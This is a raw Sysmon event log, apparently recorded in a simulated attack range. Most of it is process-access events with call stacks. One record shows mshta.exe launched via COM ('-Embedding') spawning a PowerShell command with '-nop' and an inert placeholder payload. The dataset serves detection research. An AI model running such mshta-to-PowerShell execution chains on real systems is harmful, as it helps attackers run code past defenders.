15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025129Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025128Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025127Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.475{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.475{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.444{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.444{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000025430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.397{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wllod2n0.4xh.ps12021-01-20 15:59:30.397 10341000x800000000000000025429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.382{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.350{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5B06-00000000A301}6336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.350{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5B06-00000000A301}6336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.350{7901BC46-5362-6008-5B06-00000000A301}63365256C:\Windows\system32\conhost.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.335{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5362-6008-5B06-00000000A301}6336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.335{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.335{7901BC46-5362-6008-5906-00000000A301}63047620C:\Windows\System32\mshta.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.342{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exeC:\Windows\System32\mshta.exe -Embedding 10341000x800000000000000025417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.304{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.304{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.304{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.304{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.288{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.288{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.272{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 